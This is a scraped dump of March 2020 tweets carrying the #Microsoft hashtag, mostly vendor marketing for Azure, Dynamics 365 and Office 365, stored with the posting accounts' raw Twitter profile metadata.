    <t>{'id': 40556669, 'id_str': '40556669', 'name': 'Portable One', 'screen_name': 'PortableOne', 'location': 'Pleasanton, CA', 'description': 'We customize notebooks &amp; laptops: Apple Mac, iPad, ASUS, Samsung, Toshiba, HP, Lenovo &amp; more', 'url': 'http://t.co/Kat9C7b5vP', 'entities': {'url': {'urls': [{'url': 'http://t.co/Kat9C7b5vP', 'expanded_url': 'http://www.PortableOne.com', 'display_url': 'PortableOne.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1406, 'friends_count': 1789, 'listed_count': 23, 'created_at': 'Sat May 16 22:36:29 +0000 2009', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9982,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'http://pbs.twimg.com/profile_images/449678104588337152/GjyLbnX5_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/449678104588337152/GjyLbnX5_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/40556669/1396046662',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</si>
  <si>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19:22:55 +0000 2020</t>
  </si>
  <si>
    <t>Adobe has a 35-year history of delivering great digital experiences. Where did it turn when it came time to modernize its IT infrastructure? #Microsoft #Azure, of course! https://t.co/SNCndnR7Oa</t>
  </si>
  <si>
    <t>Tue Mar 03 19:22:28 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "German BSI Tells Local Govt Authorities Not to Pay Ransoms:" https://t.co/laTsviCNEK
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Tue Mar 03 19:22:15 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/HG9Lm0fnrV</t>
  </si>
  <si>
    <t>{'id': 735051014, 'id_str': '735051014', 'name': 'GroupOne', 'screen_name': 'GroupOneIT', 'location': 'Folsom, CA', 'description': 'IT for Everyone.', 'url': 'http://t.co/YiFieKq1iz', 'entities': {'url': {'urls': [{'url': 'http://t.co/YiFieKq1iz', 'expanded_url': 'http://grouponeIT.com', 'display_url': 'grouponeIT.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 86, 'friends_count': 149, 'listed_count': 3, 'created_at': 'Fri Aug 03 15:19:53 +0000 2012', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 193,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'http://pbs.twimg.com/profile_images/3468664522/f73ae2b653c1e61b0e4fe937b08a408d_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3468664522/f73ae2b653c1e61b0e4fe937b08a408d_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/735051014/1412132225',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</si>
  <si>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19:22:13 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact IT Partner LLC for access to #Microsoft #Office365 advanced threat protection. https://t.co/NmZsOlbcEg</t>
  </si>
  <si>
    <t>{'id': 369446199, 'id_str': '369446199', 'name': 'Michael Makeyev', 'screen_name': 'MMakeyev', 'location': 'Bear, DE', 'description': '', 'url': 'http://t.co/86l3jUU3U4', 'entities': {'url': {'urls': [{'url': 'http://t.co/86l3jUU3U4', 'expanded_url': 'http://office365hq.com', 'display_url': 'office365hq.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 33, 'listed_count': 0, 'created_at': 'Wed Sep 07 11:16:26 +0000 2011', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 688,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'http://pbs.twimg.com/profile_images/378800000223178692/e7f781f9021c7da2efe816170d1f4d14_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000223178692/e7f781f9021c7da2efe816170d1f4d14_normal.jpeg',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</si>
  <si>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19:22:01 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has quietly started offering free trials of its premium Teams chat app to 'support public health and safety' amid the #coronavirus outbreak reports @ashannstew for @BusinessInsider https://t.co/t2TWfJydWG #Technology #Microsoft #Health #Safety</t>
  </si>
  <si>
    <t>{'id': 1573249092, 'id_str': '1573249092', 'name': 'Messageplicity Media', 'screen_name': 'messageplicity', 'location': 'Saint Louis, Missouri ', 'description': 'Your message with right mix of media to spark conversations and connections. Ignition underway!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2323, 'friends_count': 1919, 'listed_count': 381, 'created_at': 'Sat Jul 06 17:28:58 +0000 2013', 'favourites_count': 17453, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 53902, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/584449754303602688/YOc5eItB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/584449754303602688/YOc5eItB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1573249092/1428182588', 'profile_link_color': '3B94D9',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</si>
  <si>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19:21:00 +0000 2020</t>
  </si>
  <si>
    <t>How can you help students tackle the complex challenges of tomorrow? See how educators are transforming learning through student-centered approaches. #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/BEKbfvtsmu</t>
  </si>
  <si>
    <t>Tue Mar 03 19:19:13 +0000 2020</t>
  </si>
  <si>
    <t>Business Central Device License Capabilities &amp;amp;amp; When to Use 
https://t.co/Wjf6J3EZTe
#MSDyn365bc #Microsoft #Licensing</t>
  </si>
  <si>
    <t>Tue Mar 03 19:17:00 +0000 2020</t>
  </si>
  <si>
    <t>Healthcare is a personal experience.
It makes sense that outcomes improve when patients are empowered with self-configurable, personalized solutions...regardless of their age.
#PatientEngagement #AI #HIMSS20 #Azure #Microsoft @HIMSS @Health_IT 
https://t.co/q2Ptyd1S3R https://t.co/bmxWSoepaN</t>
  </si>
  <si>
    <t>{'id': 848171, 'id_str': '848171', 'name': 'FollowMyHealth', 'screen_name': 'FMHMobile', 'location': 'Orlando, FL', 'description': 'Improving care quality &amp; outcomes w/#PatientEngagement. The right info at the right time throughout the care journey. (FDBA HealthGrid). https://t.co/qjDylu4NRe', 'url': 'https://t.co/foSz31Oat3', 'entities': {'url': {'urls': [{'url': 'https://t.co/foSz31Oat3', 'expanded_url': 'http://www.healthgrid.com', 'display_url': 'healthgrid.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/qjDylu4NRe', 'expanded_url': 'http://bit.ly/FMHSocial', 'display_url': 'bit.ly/FMHSocial', 'indices': [137, 160]}]}}, 'protected': False, 'followers_count': 8258, 'friends_count': 2865, 'listed_count': 348, 'created_at': 'Fri Mar 09 21:26:40 +0000 2007', 'favourites_count': 3595, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9635, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6E6E6E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1085554441992974336/zKMo69cy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085554441992974336/zKMo69cy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/848171/1574269719', 'profile_link_color': 'FFCB07', 'profile_sidebar_border_color': '87BC44', 'profile_sidebar_fill_color': 'E0FF92', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 19:16:27 +0000 2020</t>
  </si>
  <si>
    <t>How do you analyze 35 billion data points to produce a car capable of speeds exceeding 200 MPH? The @RenaultF1Team uses #Microsoft solutions including #Dynamics365 and machine learning tools. Watch this video to come up to speed! #cloud #technology https://t.co/RShBMZS8CQ</t>
  </si>
  <si>
    <t>Tue Mar 03 19:16:02 +0000 2020</t>
  </si>
  <si>
    <t>Round-up for recently released Dynamics 365 Customer Service features unveiled #microsoft #dynamics365 https://t.co/s3xB6vpp4x https://t.co/TN96VVT1NC</t>
  </si>
  <si>
    <t>Tue Mar 03 19:15:10 +0000 2020</t>
  </si>
  <si>
    <t>Master #Microsoft #Word with These 10 Quick and Easy Shortcuts https://t.co/ByxAwslx0K</t>
  </si>
  <si>
    <t>Tue Mar 03 19:14:41 +0000 2020</t>
  </si>
  <si>
    <t>Who doesn't want to streamline accounting, better manage costs, and connect with customers? Excellent article on #growthhacks for small businesses. Check it out here:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/CQTtK3Z1KE</t>
  </si>
  <si>
    <t>Tue Mar 03 19:14:02 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Arbela. https://t.co/IY2Twss7Ru</t>
  </si>
  <si>
    <t>{'id': 271697072, 'id_str': '271697072', 'name': 'Tim Harris', 'screen_name': 'harristimothy', 'location': 'Los Angeles, CA', 'description': 'VP Strategy @ArbelaTech Bridging the divide between Consulting &amp; Digital Worlds. Analytics, Customer Exp &amp; Digital Revolution through Microsoft Tech', 'url': 'https://t.co/ERoIueG0Ou', 'entities': {'url': {'urls': [{'url': 'https://t.co/ERoIueG0Ou', 'expanded_url': 'http://www.arbelatech.com', 'display_url': 'arbelatech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1824, 'friends_count': 1319, 'listed_count': 424, 'created_at': 'Fri Mar 25 00:58:48 +0000 2011', 'favourites_count': 2565, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 13292,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'http://pbs.twimg.com/profile_images/894940196453535744/ovbIdB26_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/894940196453535744/ovbIdB26_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/271697072/1503938264', 'profile_link_color': '0084B4',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</si>
  <si>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19:14:00 +0000 2020</t>
  </si>
  <si>
    <t>Waitress in Japan becomes self-taught developer in #Microsoft #PowerBI and #Azure to digitally transform her restaurant--now her applications are being adopted by others in the food service industry. Watch her incredible story. https://t.co/7sBPj8lbyR</t>
  </si>
  <si>
    <t>{'id': 1111304163848183808, 'id_str': '1111304163848183808', 'name': 'scalestack', 'screen_name': 'scalestack1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Thu Mar 28 16:28:54 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 315, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1111304515053981698/Q-3DvKUs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1111304515053981698/Q-3DvKUs_normal.jpg',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</si>
  <si>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19:13:24 +0000 2020</t>
  </si>
  <si>
    <t>Subscribe to discover how #Dynamics365 and other #Microsoft solutions can help you elevate and transform engagements with both existing and prospective customers. https://t.co/yNcnKYgPPZ</t>
  </si>
  <si>
    <t>{'id': 49912277, 'id_str': '49912277', 'name': 'GHA Technologies', 'screen_name': 'GHATechnologies', 'location': 'Scottsdale AZ', 'description': 'We are a comprehensive IT Solutions Provider and Full Service Systems Integrator.', 'url': 'http://t.co/PSbdPgVhX3', 'entities': {'url': {'urls': [{'url': 'http://t.co/PSbdPgVhX3', 'expanded_url': 'http://gha-associates.com/', 'display_url': 'gha-associates.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 761, 'friends_count': 753, 'listed_count': 29, 'created_at': 'Tue Jun 23 07:07:37 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3907,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'http://pbs.twimg.com/profile_images/658722961080238080/addig-h3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/658722961080238080/addig-h3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49912277/1445898043', 'profile_link_color': '9F1B25',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</si>
  <si>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Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/fc5Ogw2FBS</t>
  </si>
  <si>
    <t>Tue Mar 03 19:13:09 +0000 2020</t>
  </si>
  <si>
    <t>@realsharat96 @PlayStation Never ending 
#XBox Vs #Playstation War
I am #Halo fan which is #XBox exclusive. But i do like some of #Playstation Games (#TheLastOfUs, #GodOfWar).
#HaloInfinite
#Halo #XBox #XBoxOneX #Microsoft #343Industries #XboxGameStudios</t>
  </si>
  <si>
    <t>Tue Mar 03 19:12:37 +0000 2020</t>
  </si>
  <si>
    <t>Arrived in Darmstadt for #SQLKonferenz - looking forward to catch up with the #Microsoft #DataPlatform #Community! Whos around? #SQLPASS_DE</t>
  </si>
  <si>
    <t>Tue Mar 03 19:11:58 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to turn raw business data into informed business decisions with #Dynamics365, #PowerBI, and other #Microsoft solutions. Subscribe today. https://t.co/2KykcQAJpg</t>
  </si>
  <si>
    <t>{'id': 760179486939750402, 'id_str': '760179486939750402', 'name': 'T4SPartners', 'screen_name': 'T4SPartners', 'location': 'Denver, CO', 'description': 'T4S Partners is a IT Consultancy, specializing in Advisory Services, IT Service Management, Cloud Enablement and Custom Development and Managed Services.', 'url': 'https://t.co/2RypQrhDbD', 'entities': {'url': {'urls': [{'url': 'https://t.co/2RypQrhDbD', 'expanded_url': 'http://www.T4SPartners.com', 'display_url': 'T4SPartners.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 149, 'friends_count': 325, 'listed_count': 6, 'created_at': 'Mon Aug 01 18:24:48 +0000 2016', 'favourites_count': 606, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 554, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/761208594188513281/EtAYvFsD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/761208594188513281/EtAYvFsD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/760179486939750402/1538680826',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</si>
  <si>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19:11:57 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/hzwA8Fj9DK</t>
  </si>
  <si>
    <t>{'id': 226337993, 'id_str': '226337993', 'name': 'James Keefner', 'screen_name': 'CloudFactors', 'location': 'Joplin, MO', 'description': 'Microsoft Cloud partner | software advisor to legal professionals | Customer Immersion Experience facilitator | @Microsoft365 | Surface | IT services &amp; security', 'url': 'https://t.co/wieYeR45lZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/wieYeR45lZ', 'expanded_url': 'http://www.cloudfactors.com', 'display_url': 'cloudfactors.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 417, 'listed_count': 7, 'created_at': 'Mon Dec 13 22:54:56 +0000 2010', 'favourites_count': 217, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1180,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'http://pbs.twimg.com/profile_images/958472654746349568/4uQivejX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/958472654746349568/4uQivejX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/226337993/1415450732',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</si>
  <si>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19:11:52 +0000 2020</t>
  </si>
  <si>
    <t>88 percent of companies report that having a unified #DigitalWorkspace has saved them nearly $5 million over three years. Subscribe now to learn how you can save both time and money with #Microsoft. https://t.co/5wdzoPktty</t>
  </si>
  <si>
    <t>Tue Mar 03 19:11:48 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/hsQgx6wWc1</t>
  </si>
  <si>
    <t>Tue Mar 03 19:11:32 +0000 2020</t>
  </si>
  <si>
    <t>NGO Files Complaint Against #Microsoft in #Spain Due to Antisemitic Results in Search Engine #Bing https://t.co/waiLNZh1eV https://t.co/IzdRkDxnhw</t>
  </si>
  <si>
    <t>{'id': 2391345684, 'id_str': '2391345684', 'name': 'Constitutional Nobody', 'screen_name': 'USSANews', 'location': 'USSANews.com ', 'description': "Founder of the Tea Party's Front Page. Old school. Mensa, NRA, USN vet. Rednecker &amp; boondocker than you. ÎœÎŸÎ›Î©Î Î›Î‘Î’Î• (John 15:13.) #IAmTheSecondAmendment", 'url': 'https://t.co/sYwLU0HPJU', 'entities': {'url': {'urls': [{'url': 'https://t.co/sYwLU0HPJU', 'expanded_url': 'http://TeaPartyGear.com', 'display_url': 'TeaPartyGear.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 41157, 'friends_count': 39352, 'listed_count': 199, 'created_at': 'Sat Mar 15 17:08:30 +0000 2014', 'favourites_count': 79177, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 448551,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'http://pbs.twimg.com/profile_images/734166067455483904/ACRNB-rD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/734166067455483904/ACRNB-rD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2391345684/1503581986',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</si>
  <si>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19:11:31 +0000 2020</t>
  </si>
  <si>
    <t>With #Microsoft #Office365 #AdvancedThreatProtection, Best Networks Inc offers an email filtering service that delivers stronger protection against specific types of advanced threats. https://t.co/zyUB6jKBEm</t>
  </si>
  <si>
    <t>Tue Mar 03 19:11:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft recognized by #Forrester as a leader in #EnterpriseBI in latest report, "The Forrester Wave: Enterprise BI Platforms (Vendor-Managed), Q3 2019." Highest scores in strategy and market presence. Read the blog. https://t.co/AUHcZo8gHo</t>
  </si>
  <si>
    <t>Tue Mar 03 19:11:16 +0000 2020</t>
  </si>
  <si>
    <t>When you do something right, your employees let you know. Here's what NQCranes heard from administrators, technicians, &amp;amp; managers when they migrated to a #Microsoft cloud-based #ERP system. Watch now. #Technology #IT #BusinessAutomation https://t.co/pGNW9ZICos</t>
  </si>
  <si>
    <t>Tue Mar 03 19:07:00 +0000 2020</t>
  </si>
  <si>
    <t>. @TexasChildrens AVP &amp;amp; CISO Teresa Tonthat talks to HPE's Jeff Carlat about the typical challenges that come with securing over 35,000 #IoT devices. More at: https://t.co/6tS68hfX2F
#HPEalliances #Microsoft #IoTSecurity #HCIT #healthcare #DigitalTransformation #HealthcareIoT https://t.co/JAdQ1Gw0oJ</t>
  </si>
  <si>
    <t>Tue Mar 03 19:05:15 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN options for #Microsoft @Azure cloud-based deployments. #Windows10 #Win10 #aovpn #Azure https://t.co/S4R6RuY4dR</t>
  </si>
  <si>
    <t>Tue Mar 03 19:04:03 +0000 2020</t>
  </si>
  <si>
    <t>Part 3 of our AD Exploitation using #ADSI series.  This one explains how to perform SPN scanning using ADSI.
https://t.co/xlRvOvODs4
#activedirectory #crtp #oscp #penetrationtesting #cybersecurity #ethicalhacking #hacking #enumeration #microsoft #offensivesecurity, #redteam</t>
  </si>
  <si>
    <t>{'id': 3253025965, 'id_str': '3253025965', 'name': 'Yaksas CSC', 'screen_name': 'yaksas443', 'location': 'Uttar Pradesh, India', 'description': 'Yaká¹£as Cyber Security Champions (CSC), is an organization of Cyber  Security Professionals (CSPs), dedicated to protect people in the Cyber World', 'url': 'https://t.co/mVB1KfL7TI', 'entities': {'url': {'urls': [{'url': 'https://t.co/mVB1KfL7TI', 'expanded_url': 'https://www.yaksas.io', 'display_url': 'yaksas.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 108, 'friends_count': 81, 'listed_count': 2, 'created_at': 'Mon Jun 22 19:56:09 +0000 2015', 'favourites_count': 140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 332,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'http://pbs.twimg.com/profile_images/613111424433270784/J930tZYh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/613111424433270784/J930tZYh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3253025965/1440177929',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</si>
  <si>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19:02:34 +0000 2020</t>
  </si>
  <si>
    <t>With #AI, any sized company can leverage their data and excel at decision making. Download the 'Competing in the Digital Age' eBook to learn how.    #Microsoft #Technology #BusinessAutomation #MSDyn365 https://t.co/SNvxcJQZHi</t>
  </si>
  <si>
    <t>{'id': 743545295527501824, 'id_str': '743545295527501824', 'name': 'Spectrum', 'screen_name': 'SpectrumB2B', 'location': 'Tacoma, WA', 'description': "#B2B consultants for workplace retirement plans &amp; business solutions | #ERISA Experts | #Microsoft Partner | Follow our mascot @Dr401k &amp; Tweet your #401k Q's.", 'url': 'https://t.co/gWRtTydrDm', 'entities': {'url': {'urls': [{'url': 'https://t.co/gWRtTydrDm', 'expanded_url': 'http://www.spconsultants.com', 'display_url': 'spconsultants.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 61, 'friends_count': 169, 'listed_count': 2, 'created_at': 'Thu Jun 16 20:46:27 +0000 2016', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 697,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'http://pbs.twimg.com/profile_images/974024676111409152/ZrNwCgl8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/974024676111409152/ZrNwCgl8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/743545295527501824/1521060396', 'profile_link_color': '4F758B',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</si>
  <si>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Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/ak3kwmVaZp</t>
  </si>
  <si>
    <t>{'id': 895690909181923328, 'id_str': '895690909181923328', 'name': 'Rosewood IT', 'screen_name': 'RosewoodITMSP', 'location': 'Montgomery, AL', 'description': 'TRG is a Managed IT Services Provider serving SMBs in the River Region area of central Alabama', 'url': 'https://t.co/8L4WR0YZEa', 'entities': {'url': {'urls': [{'url': 'https://t.co/8L4WR0YZEa', 'expanded_url': 'http://rosewoodit.com', 'display_url': 'rosewoodit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 99, 'friends_count': 121, 'listed_count': 0, 'created_at': 'Thu Aug 10 16:58:48 +0000 2017', 'favourites_count': 69, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 961, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/895696242344419329/HtknhNK6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895696242344419329/HtknhNK6_normal.jpg',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</si>
  <si>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19:02:27 +0000 2020</t>
  </si>
  <si>
    <t>Investing in a cybersecurity program is no longer optional, no matter the size of your business. Check out this infographic to learn more about how you can protect your business with our #Microsoft #security solutions. https://t.co/aVRLooLtGB</t>
  </si>
  <si>
    <t>Tue Mar 03 19:02:16 +0000 2020</t>
  </si>
  <si>
    <t>Coming to Lagos soon. Azure and M365 Saturday. Stay tuned..... #mctbuzz #mvpbuzz #mctnigeria #sharepoint #microsoft365 #azure #mct #yammer #o365 #microsoftazure #microsoftng #microsoftteams #sharepointonline #microsoft #microsoftplanner #mctnaijaug #flows...https://t.co/7NeBTiTXaO</t>
  </si>
  <si>
    <t>Tue Mar 03 19:01:51 +0000 2020</t>
  </si>
  <si>
    <t>Theres an easy way to segment a SharePoint list into multiple sections. Our good old friends, folders. Ill explain how to do that and how to generate other views on top of that data #microsoft #sharepoint #tutorial https://t.co/3F7AEGFGZJ https://t.co/fi3r06XBIU</t>
  </si>
  <si>
    <t>{'id': 98004472, 'id_str': '98004472', 'name': 'Manuel T. Gomes', 'screen_name': 'manueltgomes', 'location': 'Lisbon, Portugal', 'description': 'ðŸ’¼ Project Manager @pestanahotels | âœï¸ I write about SharePoint, Power Automate, PowerApps, Productivity, and Privacy | ðŸ—¯ï¸ DMs are open | ðŸ˜ƒ Views are my own.', 'url': 'https://t.co/aRmySoDy18', 'entities': {'url': {'urls': [{'url': 'https://t.co/aRmySoDy18', 'expanded_url': 'https://www.manueltgomes.com', 'display_url': 'manueltgomes.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 205, 'friends_count': 495, 'listed_count': 4, 'created_at': 'Sat Dec 19 23:35:46 +0000 2009', 'favourites_count': 343, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 777,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'http://pbs.twimg.com/profile_images/660924128657088512/F4FR7z03_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/660924128657088512/F4FR7z03_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/98004472/1566553483',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</si>
  <si>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19:01:20 +0000 2020</t>
  </si>
  <si>
    <t>According to @SOC_Prime in the post on @Peerlyst, "Attackers look around for Microsoft Exchange servers vulnerable to CVE-2020-0688". #microsoft #exchange #CVE https://t.co/qapB0Z4Oee</t>
  </si>
  <si>
    <t>{'id': 389082372, 'id_str': '389082372', 'name': 'Limor Elbaz', 'screen_name': 'LimorElbaz', 'location': 'San Francisco, CA', 'description': 'Founder &amp; CEO @Peerlyst. Salad master. #InfoSec Lover. Never buy water!', 'url': 'http://t.co/8N9CvQrhEu', 'entities': {'url': {'urls': [{'url': 'http://t.co/8N9CvQrhEu', 'expanded_url': 'http://www.peerlyst.com', 'display_url': 'peerlyst.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3545, 'friends_count': 3002, 'listed_count': 468, 'created_at': 'Tue Oct 11 20:39:49 +0000 2011', 'favourites_count': 6132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 43259,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'http://pbs.twimg.com/profile_images/378800000630848638/ca1bb5b36b7e2a1682d7a6295de6dbfb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000630848638/ca1bb5b36b7e2a1682d7a6295de6dbfb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/389082372/1382403008',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</si>
  <si>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19:00:16 +0000 2020</t>
  </si>
  <si>
    <t>Educating Educators: #Microsoft's Tips for #Security Awareness Training https://t.co/5cHKugHQ5k #DarkReading</t>
  </si>
  <si>
    <t>Tue Mar 03 19:00:06 +0000 2020</t>
  </si>
  <si>
    <t>How do you digitalize quickly? Organizations face a choice of building their own #IoT platform or buying a pre-built platform. Read this joint #Microsoft and #Siemens white paper to learn more. #TodayMeetsTomorrow https://t.co/LBTYUdJFN1 https://t.co/Nyc5EydfQI</t>
  </si>
  <si>
    <t>{'id': 14266064, 'id_str': '14266064', 'name': 'Siemens Digital Industries Software', 'screen_name': 'siemenssoftware', 'location': '', 'description': 'Where #TodayMeetsTomorrow', 'url': 'https://t.co/gXmqZdE8pg', 'entities': {'url': {'urls': [{'url': 'https://t.co/gXmqZdE8pg', 'expanded_url': 'https://www.sw.siemens.com/', 'display_url': 'sw.siemens.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 32064, 'friends_count': 2234, 'listed_count': 632, 'created_at': 'Mon Mar 31 13:52:21 +0000 2008', 'favourites_count': 2038, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 16524, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F7F7F7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/974769614377766912/uOchWWjC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/974769614377766912/uOchWWjC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14266064/1535750021', 'profile_link_color': '008299', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F0F0F0', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 